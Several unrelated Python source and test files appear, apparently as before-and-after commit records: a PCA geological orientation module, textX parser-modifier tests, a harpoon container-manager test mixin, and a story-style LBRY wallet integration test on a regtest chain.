_[:size[0],:size[1]] = matrix
return _
def augment_vector(vec):
return N.append(vec,[1],axis=0)
def rotate_tensor(tensor,transform):
"""
Transforms a tensor by an affine transform
"""
return dot(transform, tensor, transform.T)
def compose_affine(*transforms):
"""
Returns a composite of several affine transformations.
"""
return reduce(N.dot,reversed(transforms))
def normalize(v):
return v/N.linalg.norm(v)
def vector_angle(v1,v2):
_ = N.dot(normalize(v1),normalize(v2).T)
return N.arccos(_)
## magnitude of vector (by row)
norm = lambda x: N.linalg.norm(x,2,1)
def axis_transform(pca_axes):
"""
Creates an affine transformation matrix to
rotate data in PCA axes into Cartesian plane
"""
from_ = N.identity(3)
to_ = pca_axes
# Find inverse transform for forward transform
# y = M x -> M = y (x)^(-1)
# We don't need to do least-squares since
# there is a simple transformation
trans_matrix = N.linalg.lstsq(from_,to_)[0]
return trans_matrix
def test_SVD(pca):
"""
Function to test the validity of singular
value decomposition by reconstructing original
data.
"""
_ = pca
rec = N.dot(_.U,N.dot(_.sigma,_.V))
assert N.allclose(_.arr,rec)
def covariance_matrix(self):
"""
Constructs the covariance matrix of
input data from
the singular value decomposition. Note
that this is different than a covariance
matrix of residuals, which is what we want
for calculating fit errors.
Using SVD output to compute covariance matrix
X=UΣV⊤
XX⊤XX⊤=(UΣV⊤)(UΣV⊤)⊤=(UΣV⊤)(VΣU⊤)
V is an orthogonal matrix (V⊤V=I),
covariance matrix of input data: XX⊤=UΣ2U⊤
Because the axes represent identity in the
PCA coordinate system, the PCA major axes
themselves represent an affine transformation
matrix from PCA to Cartesian space
"""
a = N.dot(self.U,self.sigma)
cv = N.dot(a,a.T)
# This yields the covariance matrix in Cartesian
# coordinates
return cv
class PCAOrientation(BaseOrientation):
""" Gets the axis-aligned principle components
of the dataset.
"""
def __init__(self, arr):
""" Requires an object implementing the
Attitude interface
"""
# For principal components, data needs
# to be pre-processed to have zero mean
self.arr = centered(arr)
# Note: it might be desirable to further
# standardize the data by dividing by
# the standard deviation as such
# self.arr /= self.arr.std(axis=0)
# but this is not clear. Not dividing by
# std leaves us with an eigen-analysis of
# the *covariance matrix*, while dividing
# by it leaves us with an eigen-analysis
# of the *correlation matrix*
self.n = len(self.arr)
#ratio = self.n/1e4
#if ratio > 2:
# r = N.floor(ratio)
# self.n /= r
# self.arr = self.arr[::r,:]
res = N.linalg.svd(self.arr,
full_matrices=False)
self.U, s, V = res
self.singular_values = s
self.axes = V
self.sigma = N.diag(self.singular_values)
self.V = V
# Similar to normal vector, but not rotated into
# Cartesian frame
self.offset = N.cross(self.sigma[0],self.sigma[1])
self.normal = self.axes[2]
self._vertical = N.array([0,0,1])
self.strike = N.cross(self.normal,self._vertical)
self.dip_dr = normalize(N.cross(self.strike,self.normal))
def whitened(self):
"""
Returns a 'whitened' or decorrelated version of
the input data, where variances along all axes
are rescaled to 1 (i.e. the covariance matrix
becomes an identity matrix).
"""
return N.dot(self.U,self.V.T)
def rotated(self):
"""
Returns a dataset 'despun' so that
it is aligned with the princpal
axes of the dataset.
"""
return N.dot(self.U,self.sigma)
def residuals(self):
"""
Returns residuals of fit against all
three data axes (singular values 1, 2,
and 3). This takes the form of data along
singular axis 3 (axes 1 and 2 define the plane)
"""
_ = self.rotated()
_[:,-1] = 0
_ = N.dot(_,self.axes)
return self.arr - _
@property
def covariance_matrix(self):
"""
Constructs the covariance matrix from PCA
residuals
"""
return self.sigma**2/(self.n-1)
@property
def explained_variance(self):
"""
Proportion of variance that is explained by the
first two principal components (which together
represent the planar fit). Analogous to R^2 of
linear least squares.
"""
v = N.diagonal(self.covariance_matrix)
return v[0:2].sum()/v.sum()
@property
def coefficients(self):
return self.axes[2]
@property
def azimuth(self):
c = self.coefficients
return N.arctan2(c[0],c[1])
@property
def slope(self):
_ = self.coefficients
mag = N.linalg.norm(_)
return N.arccos(_[2]/mag)
def strike_dip(self):
""" Computes strike and dip from a normal vector.
Results are usually exactly the same as LLSQ
in strike (to a few decimal places) and close in dip.
Sometimes, dips are greater by as much as 45 degrees,
reflecting inclusion of errors in x-y plane.
"""
n = self.axes[2]
r = N.linalg.norm(n)
strike = N.degrees(N.arctan2(n[0],n[1]))-90
dip = N.degrees(N.arccos(n[2]/r))
# Since PCA errors are not pinned to the XYZ plane,
# we need to make sure our results are in the
# right quadrant.
if dip > 90:
dip = 180 - dip
strike += 180
return strike, dip
def as_conic(self, level=1):
if dot(self.axes[2],vector(0,0,1)) < 0:
self.axes *= -1
cov = self.covariance_matrix
idx = N.diag_indices(3)
ell = N.identity(4)
ell[idx] = 1/cov[idx]*level**2 #cov*level**2#
ell[3,3] = -1
ell = conic(ell)
# Translate ellipse along 3rd major axis
ell = ell.translate(self.offset)
# Rotate ellipse matrix into cartesian
# plane
R = augment(self.axes)
return ell.transform(R)
def as_hyperbola(self, rotated=False):
"""
Hyperbolic error area
"""
idx = N.diag_indices(3)
_ = 1/self.covariance_matrix[idx]
d = list(_)
d[-1] *= -1
arr = N.identity(4)*-1
arr[idx] = d
return conic(arr)
def _ellipse(self, level=1):
ell = self.as_conic(level=level)
con, matrix, center = ell.projection()
ax = con.major_axes()
# Rotate major axes into 3d space
axs_ = N.append(ax,N.zeros((2,1)),axis=1)
axs = dot(axs_,matrix[:3])
u = N.linspace(0,2*N.pi,1000)
# Get a bundle of vectors defining cone
# which circumscribes ellipsoid
angles = N.array([N.cos(u),N.sin(u)]).T
# Turn into vectors
return dot(angles,axs),center
def plane_errors(self, **kwargs):
data, center = self._ellipse(**kwargs)
data += center
v = N.cross(data,center)
#2v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge = N.arcsin(v[:,2]/r)
trend = N.arctan2(v[:,0],v[:,1])
v = N.cross(center,data)
#v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge2 = N.arcsin(v[:,2]/r)
trend2 = N.arctan2(v[:,0],v[:,1])
return ((N.pi+trend,plunge),(N.pi+trend2,plunge2))
def error_ellipse(self, spherical=True, vector=False, level=1):
data,center = self._ellipse(level)
data += center
r = N.linalg.norm(data,axis=1)
plunge = N.arcsin(data[:,2]/r)
trend = N.arctan2(data[:,0],data[:,1])
#m = N.linalg.norm(axs,axis=1)
#c = N.linalg.norm(center)
#a_dist = [N.degrees(N.arctan2(i,c)) for i in m]
#if spherical:
# return e + N.array([self.azimuth+N.pi/2,0])
return (trend,plunge)
def bootstrap(self):
reg_func = lambda arr: N.linalg.svd(arr,full_matrices=False)[2][2]
beta_boots = bootstrap(self.arr, func=reg_func)
return yhat, yhat_boots
|
from __future__ import unicode_literals
import pytest
from textx.metamodel import metamodel_from_str
from textx.exceptions import TextXSyntaxError
def test_modifier_separator_zeroormore():
model = """
Rule:
("a"|"b")*[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
def test_modifier_separator_oneormore():
model = """
Rule:
("a"|"b")+[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
with pytest.raises(TextXSyntaxError):
# Must be separated with comma
metamodel.model_from_str("a b")
with pytest.raises(TextXSyntaxError):
# At least one must be matched
metamodel.model_from_str("")
def test_modifier_separator_optional():
model = """
Rule:
("a"|"b")?[','];
"""
with pytest.raises(TextXSyntaxError):
# Modifiers are not possible for ? operator
metamodel_from_str(model)
def test_modifier_separator_unordered_group():
model = """
Rule:
("a" "b" "c")#[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a, b, c")
assert model
model = metamodel.model_from_str("c, a, b")
assert model
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, a, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str(",a, c, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, b, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ,b ")
def test_assignment_modifier_separator_zeroormore():
model = """
Rule:
a*=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_oneormore():
model = """
Rule:
a+=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_optional():
"""
Modifiers are not allowed for ?= assignment.
"""
model = """
Rule:
a?=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_assignment_modifier_separator_plain():
"""
Modifiers are not allowed for plain assignment.
"""
model = """
Rule:
a=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_modifier_eolterm_zeroormore():
model = """
Rule:
'first'
INT*[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_modifier_eolterm_oneormore():
model = """
Rule:
'first'
INT+[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_multiple_modifiers():
"""
Multiple modifier may be specified separated with space.
"""
model = """
Rule:
'first'
INT+[eolterm ','] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers separated with comma
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34, 56, 88, 65
123456
""")
assert model
Test for unordered groups with separator and optionals.
from __future__ import unicode_literals
import pytest
from textx.metamodel import metamodel_from_str
from textx.exceptions import TextXSyntaxError
def test_modifier_separator_zeroormore():
model = """
Rule:
("a"|"b")*[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
def test_modifier_separator_oneormore():
model = """
Rule:
("a"|"b")+[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
with pytest.raises(TextXSyntaxError):
# Must be separated with comma
metamodel.model_from_str("a b")
with pytest.raises(TextXSyntaxError):
# At least one must be matched
metamodel.model_from_str("")
def test_modifier_separator_optional():
model = """
Rule:
("a"|"b")?[','];
"""
with pytest.raises(TextXSyntaxError):
# Modifiers are not possible for ? operator
metamodel_from_str(model)
def test_modifier_separator_unordered_group():
model = """
Rule:
("a" "b" "c")#[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a, b, c")
assert model
model = metamodel.model_from_str("c, a, b")
assert model
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, a, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str(",a, c, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, b, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ,b ")
def test_modifier_separator_unordered_group_with_optionals():
model = """
Rule:
("a" "b"? "c")#[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a, b, c")
assert model
model = metamodel.model_from_str("c, a")
assert model
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, a, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str(",a, c, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, b, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ,b ")
def test_assignment_modifier_separator_zeroormore():
model = """
Rule:
a*=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_oneormore():
model = """
Rule:
a+=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_optional():
"""
Modifiers are not allowed for ?= assignment.
"""
model = """
Rule:
a?=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_assignment_modifier_separator_plain():
"""
Modifiers are not allowed for plain assignment.
"""
model = """
Rule:
a=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_modifier_eolterm_zeroormore():
model = """
Rule:
'first'
INT*[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_modifier_eolterm_oneormore():
model = """
Rule:
'first'
INT+[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_multiple_modifiers():
"""
Multiple modifier may be specified separated with space.
"""
model = """
Rule:
'first'
INT+[eolterm ','] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers separated with comma
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34, 56, 88, 65
123456
""")
assert model
|
from harpoon.container_manager import make_server
from contextlib import contextmanager
import subprocess
import threading
import requests
import tempfile
import socket
import psutil
import signal
import pytest
import time
import sys
import os
@contextmanager
def config_file(content):
fle = None
try:
fle = tempfile.NamedTemporaryFile(delete=False)
with open(fle.name, "w") as fle:
fle.write(content)
yield fle.name
finally:
if fle and os.path.exists(fle.name):
os.remove(fle.name)
class Container_managerAssertionsMixin:
class Manager:
def __init__(self):
self.shutdowns = []
def port_connected(self, port):
s = socket.socket()
s.settimeout(5)
try:
s.connect(("127.0.0.1", port))
s.close()
return True
except Exception:
return False
def pid_running(self, pid):
return pid in [p.pid for p in psutil.process_iter()]
def assertPIDGoneWithin(self, pid, timeout):
start = time.time()
while time.time() - start < timeout:
if not self.pid_running(pid):
return
time.sleep(0.1)
assert not self.pid_running(pid)
def free_port(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("0.0.0.0", 0))
return s.getsockname()[1]
def local(self, port, path):
return "http://localhost:{0}{1}".format(port, path)
def wait_for_pid(self, pid, timeout=5):
start = time.time()
while time.time() - start < timeout:
if self.pid_running(pid):
return
os.kill(pid, signal.SIGTERM)
time.sleep(0.1)
if self.pid_running(pid):
os.kill(pid, signal.SIGKILL)
def wait_for_file(self, filename, timeout=5):
start = time.time()
while time.time() - start < timeout:
if os.path.exists(filename):
return
time.sleep(0.1)
if not os.path.exists(filename):
assert False, "Failed to wait for filename: {0}".format(filename)
def wait_for_port(self, port, timeout=2):
start = time.time()
while time.time() - start < timeout:
if self.port_connected(port):
return
time.sleep(0.1)
assert self.port_connected(port)
def assertForks(self, info, timeout=1):
start = time.time()
while time.time() - start < timeout:
if info["done"]:
return
if not info["done"]:
assert False, "The process should have forked, but it hasn't within timeout"
def version(self, info):
return requests.get(self.local(info["port"], "/version")).content.decode()
def start_inprocess(self, manager):
port = self.free_port()
server = make_server(manager, ("127.0.0.1", port))
self.shutdowns.append(server.shutdown)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
self.wait_for_port(port)
return lambda path: "http://127.0.0.1:{0}{1}".format(port, path)
def start(self, specifier, filename=None, port=None, log_file=None, config=""):
info = {"done": False, "pid": None, "port": port}
def shutdown():
if filename or not info["done"]:
if info["port"]:
requests.get("http://localhost:{0}/shutdown".format(info["port"]))
if info["pid"]:
self.wait_for_pid(info["pid"])
if "p" in info:
info["p"].kill()
self.shutdowns.append(shutdown)
info["shutdown"] = shutdown
def start():
options = ""
if log_file:
options = ', "--logging-handler-file", "{0}"'.format(log_file)
with config_file(config) as cfg:
env = dict(os.environ)
env["HARPOON_CONFIG"] = cfg
command = (
'from harpoon.executor import main; main(["container_manager", "{0}"{1}])'
)
info["p"] = subprocess.Popen(
[sys.executable, "-c", command.format(specifier, options)], env=env
)
info["p"].wait()
info["done"] = True
thread = threading.Thread(target=start)
thread.daemon = True
thread.start()
if port:
self.wait_for_port(port)
if filename:
self.wait_for_file(filename)
with open(filename) as fle:
lines = fle.readlines()
assert len(lines) == 2
info["port"] = int(lines[0])
if port:
assert info["port"] == port
info["pid"] = int(lines[1])
assert self.pid_running(info["pid"])
info["uri"] = lambda path: "http://localhost:{0}{1}".format(info["port"], path)
return info
@pytest.fixture()
def container_manager(self):
manager = self.Manager()
try:
yield manager
finally:
errors = []
for shutdown in manager.shutdowns:
try:
shutdown()
except Exception as error:
errors.append(error)
assert len(errors) == 0
Cleanup container manager test mixin a little
from harpoon.container_manager import make_server
from contextlib import contextmanager
import subprocess
import threading
import requests
import tempfile
import socket
import psutil
import signal
import pytest
import time
import sys
import os
@contextmanager
def config_file(content):
fle = None
try:
fle = tempfile.NamedTemporaryFile(delete=False)
with open(fle.name, "w") as fle:
fle.write(content)
yield fle.name
finally:
if fle and os.path.exists(fle.name):
os.remove(fle.name)
class Container_managerAssertionsMixin:
class Manager:
def __init__(self):
self.shutdowns = []
def port_connected(self, port):
s = socket.socket()
s.settimeout(5)
try:
s.connect(("127.0.0.1", port))
s.close()
return True
except Exception:
return False
def pid_running(self, pid):
return pid in [p.pid for p in psutil.process_iter()]
def assertPIDGoneWithin(self, pid, timeout):
start = time.time()
while time.time() - start < timeout:
if not self.pid_running(pid):
return
time.sleep(0.1)
assert not self.pid_running(pid)
def free_port(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("0.0.0.0", 0))
return s.getsockname()[1]
def local(self, port, path):
return "http://localhost:{0}{1}".format(port, path)
def wait_for_pid(self, pid, timeout=5):
start = time.time()
while time.time() - start < timeout:
if self.pid_running(pid):
return
os.kill(pid, signal.SIGTERM)
time.sleep(0.1)
if self.pid_running(pid):
os.kill(pid, signal.SIGKILL)
def wait_for_file(self, filename, timeout=5):
start = time.time()
while time.time() - start < timeout:
if os.path.exists(filename):
return
time.sleep(0.1)
if not os.path.exists(filename):
assert False, "Failed to wait for filename: {0}".format(filename)
def wait_for_port(self, port, timeout=2):
start = time.time()
while time.time() - start < timeout:
if self.port_connected(port):
return
time.sleep(0.1)
assert self.port_connected(port)
def assertForks(self, info, timeout=1):
start = time.time()
while time.time() - start < timeout:
if info["done"]:
return
if not info["done"]:
assert False, "The process should have forked, but it hasn't within timeout"
def version(self, info):
return requests.get(self.local(info["port"], "/version")).content.decode()
def start_inprocess(self, manager):
port = self.free_port()
server = make_server(manager, ("127.0.0.1", port))
uri = lambda path: "http://127.0.0.1:{0}{1}".format(port, path)
def shutdown():
if manager.shutting_down is not True:
requests.get(uri("/shutdown"))
self.shutdowns.append(shutdown)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
self.wait_for_port(port)
return uri
def start(self, specifier, filename=None, port=None, log_file=None, config=""):
uri = lambda path: "http://localhost:{0}{1}".format(info["port"], path)
info = {"done": False, "pid": None, "port": port, "uri": uri}
def shutdown():
if filename or not info["done"]:
if info["port"]:
requests.get(uri("/shutdown"))
if info["pid"]:
self.wait_for_pid(info["pid"])
if "p" in info:
info["p"].kill()
self.shutdowns.append(shutdown)
info["shutdown"] = shutdown
def start():
options = ""
if log_file:
options = ', "--logging-handler-file", "{0}"'.format(log_file)
with config_file(config) as cfg:
env = dict(os.environ)
env["HARPOON_CONFIG"] = cfg
command = (
'from harpoon.executor import main; main(["container_manager", "{0}"{1}])'
)
info["p"] = subprocess.Popen(
[sys.executable, "-c", command.format(specifier, options)], env=env
)
info["p"].wait()
info["done"] = True
thread = threading.Thread(target=start)
thread.daemon = True
thread.start()
if port:
self.wait_for_port(port)
if filename:
self.wait_for_file(filename)
with open(filename) as fle:
lines = fle.readlines()
assert len(lines) == 2
info["port"] = int(lines[0])
if port:
assert info["port"] == port
info["pid"] = int(lines[1])
assert self.pid_running(info["pid"])
return info
@pytest.fixture()
def container_manager(self):
manager = self.Manager()
try:
yield manager
finally:
errors = []
for shutdown in manager.shutdowns:
try:
shutdown()
except Exception as error:
errors.append(error)
assert len(errors) == 0
|
import sys
import json
import tempfile
import logging
from binascii import unhexlify
import twisted.internet
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from lbrynet.extras.wallet.transaction import Transaction
from lbrynet.p2p.Error import InsufficientFundsError
from lbrynet.schema.claim import ClaimDict
from torba.testcase import IntegrationTestCase
import lbrynet.schema
lbrynet.schema.BLOCKCHAIN_NAME = 'lbrycrd_regtest'
from lbrynet import conf as lbry_conf
from lbrynet.extras.daemon.Daemon import Daemon, jsonrpc_dumps_pretty
from lbrynet.extras.wallet import LbryWalletManager
from lbrynet.extras.daemon.Components import WalletComponent
from lbrynet.extras.daemon.Components import (
DHT_COMPONENT, HASH_ANNOUNCER_COMPONENT, PEER_PROTOCOL_SERVER_COMPONENT,
REFLECTOR_COMPONENT, UPNP_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
)
from lbrynet.extras.daemon.ComponentManager import ComponentManager
class FakeAnalytics:
@property
def is_started(self):
return True
def send_new_channel(self):
pass
def shutdown(self):
pass
def send_claim_action(self, action):
pass
def send_credits_sent(self):
pass
def send_server_startup(self):
pass
class CommandTestCase(IntegrationTestCase):
timeout = 180
MANAGER = LbryWalletManager
VERBOSITY = logging.WARN
async def asyncSetUp(self):
await super().asyncSetUp()
twisted.internet.reactor = sys.modules['twisted.internet.reactor'] = AsyncioSelectorReactor()
logging.getLogger('lbrynet.p2p').setLevel(self.VERBOSITY)
logging.getLogger('lbrynet.daemon').setLevel(self.VERBOSITY)
lbry_conf.settings = None
lbry_conf.initialize_settings(
load_conf_file=False,
data_dir=self.wallet_node.data_path,
wallet_dir=self.wallet_node.data_path,
download_dir=self.wallet_node.data_path
)
lbry_conf.settings['use_upnp'] = False
lbry_conf.settings['reflect_uploads'] = False
lbry_conf.settings['blockchain_name'] = 'lbrycrd_regtest'
lbry_conf.settings['lbryum_servers'] = [('localhost', 50001)]
lbry_conf.settings['known_dht_nodes'] = []
lbry_conf.settings.node_id = None
await self.account.ensure_address_gap()
address = (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
sendtxid = await self.blockchain.send_to_address(address, 10)
await self.confirm_tx(sendtxid)
await self.generate(5)
def wallet_maker(component_manager):
self.wallet_component = WalletComponent(component_manager)
self.wallet_component.wallet_manager = self.manager
self.wallet_component._running = True
return self.wallet_component
skip = [
DHT_COMPONENT, UPNP_COMPONENT, HASH_ANNOUNCER_COMPONENT,
PEER_PROTOCOL_SERVER_COMPONENT, REFLECTOR_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
]
analytics_manager = FakeAnalytics()
self.daemon = Daemon(analytics_manager, ComponentManager(
analytics_manager=analytics_manager,
skip_components=skip, wallet=wallet_maker
))
await self.daemon.setup()
self.daemon.wallet_manager = self.wallet_component.wallet_manager
self.manager.old_db = self.daemon.storage
async def asyncTearDown(self):
await super().asyncTearDown()
self.wallet_component._running = False
await self.daemon.shutdown()
async def confirm_tx(self, txid):
""" Wait for tx to be in mempool, then generate a block, wait for tx to be in a block. """
await self.on_transaction_id(txid)
await self.generate(1)
await self.on_transaction_id(txid)
async def on_transaction_dict(self, tx):
await self.ledger.wait(
self.ledger.transaction_class(unhexlify(tx['hex']))
)
@staticmethod
def get_all_addresses(tx):
addresses = set()
for txi in tx['inputs']:
addresses.add(txi['address'])
for txo in tx['outputs']:
addresses.add(txo['address'])
return list(addresses)
async def generate(self, blocks):
""" Ask lbrycrd to generate some blocks and wait until ledger has them. """
await self.blockchain.generate(blocks)
await self.ledger.on_header.where(self.blockchain.is_expected_block)
async def out(self, awaitable):
""" Converts Daemon API call results (dictionary)
to JSON and then back to a dictionary. """
return json.loads(jsonrpc_dumps_pretty(await awaitable, ledger=self.ledger))['result']
class EpicAdventuresOfChris45(CommandTestCase):
VERBOSITY = logging.WARN
async def test_no_this_is_not_a_test_its_an_adventure(self):
# Chris45 is an avid user of LBRY and this is his story. It's fact and fiction
# and everything in between; it's also the setting of some record setting
# integration tests.
# Chris45 starts everyday by checking his balance.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '10.0')
# "10 LBC, yippy! I can do a lot with that.", he thinks to himself,
# enthusiastically. But he is hungry so he goes into the kitchen
# to make himself a spamdwich.
# While making the spamdwich he wonders... has anyone on LBRY
# registered the @spam channel yet? "I should do that!" he
# exclaims and goes back to his computer to do just that!
channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# Do we have it locally?
channels = await self.out(self.daemon.jsonrpc_channel_list())
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@spam')
# As the new channel claim travels through the intertubes and makes its
# way into the mempool and then a block and then into the claimtrie,
# Chris doesn't sit idly by: he checks his balance!
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '8.989893')
# He waits for 6 more blocks (confirmations) to make sure the balance has been settled.
await self.generate(6)
result = await self.daemon.jsonrpc_account_balance(confirmations=6)
self.assertEqual(result, '8.989893')
# And is the channel resolvable and empty?
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam'))
self.assertIn('lbry://@spam', response)
self.assertIn('certificate', response['lbry://@spam'])
# "What goes well with spam?" ponders Chris...
# "A hovercraft with eels!" he exclaims.
# "That's what goes great with spam!" he further confirms.
# And so, many hours later, Chris is finished writing his epic story
# about eels driving a hovercraft across the wetlands while eating spam
# and decides it's time to publish it to the @spam channel.
with tempfile.NamedTemporaryFile() as file:
file.write(b'blah blah blah...')
file.write(b'[insert long story about eels driving hovercraft]')
file.write(b'yada yada yada!')
file.write(b'the end')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_id=channel['claim_id']
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# He quickly checks the unconfirmed balance to make sure everything looks
# correct.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '7.969786')
# Also checks that his new story can be found on the blockchain before
# giving the link to all his friends.
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
self.assertIn('lbry://@spam/hovercraft', response)
self.assertIn('claim', response['lbry://@spam/hovercraft'])
# He goes to tell everyone about it and in the meantime 5 blocks are confirmed.
await self.generate(5)
# When he comes back he verifies the confirmed balance.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '7.969786')
# As people start reading his story they discover some typos and notify
# Chris who explains in despair "Oh! Noooooos!" but then remembers
# "No big deal! I can update my claim." And so he updates his claim.
with tempfile.NamedTemporaryFile() as file:
file.write(b'blah blah blah...')
file.write(b'[typo fixing sounds being made]')
file.write(b'yada yada yada!')
file.flush()
claim2 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_name='@spam'
))
self.assertTrue(claim2['success'])
self.assertEqual(claim2['claim_id'], claim1['claim_id'])
await self.confirm_tx(claim2['tx']['txid'])
# After some soul searching Chris decides that his story needs more
# heart and a better ending. He takes down the story and begins the rewrite.
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(claim1['claim_id'], blocking=False))
self.assertTrue(abandon['success'])
await self.confirm_tx(abandon['tx']['txid'])
# And now checks that the claim doesn't resolve anymore.
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
self.assertNotIn('claim', response['lbry://@spam/hovercraft'])
# After abandoning he just waits for his LBCs to be returned to his account
await self.generate(5)
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '8.9693585')
# Amidst all this Chris receives a call from his friend Ramsey
# who says that it is of utmost urgency that Chris transfer him
# 1 LBC to which Chris readily obliges
ramsey_account_id = (await self.daemon.jsonrpc_account_create("Ramsey"))['id']
ramsey_account = self.daemon.get_account_or_error(ramsey_account_id)
ramsey_address = await self.daemon.jsonrpc_address_unused(ramsey_account_id)
result = await self.out(self.daemon.jsonrpc_wallet_send('1.0', ramsey_address))
self.assertIn("txid", result)
await self.confirm_tx(result['txid'])
# Chris then eagerly waits for 6 confirmations to check his balance and then calls Ramsey to verify whether
# he received it or not
await self.generate(5)
result = await self.daemon.jsonrpc_account_balance()
# Chris' balance was correct
self.assertEqual(result, '7.9692345')
# Ramsey too assured him that he had received the 1 LBC and thanks him
result = await self.daemon.jsonrpc_account_balance(ramsey_account_id)
self.assertEqual(result, '1.0')
# After Chris is done with all the "helping other people" stuff he decides that it's time to
# write a new story and publish it to lbry. All he needed was a fresh start and he came up with:
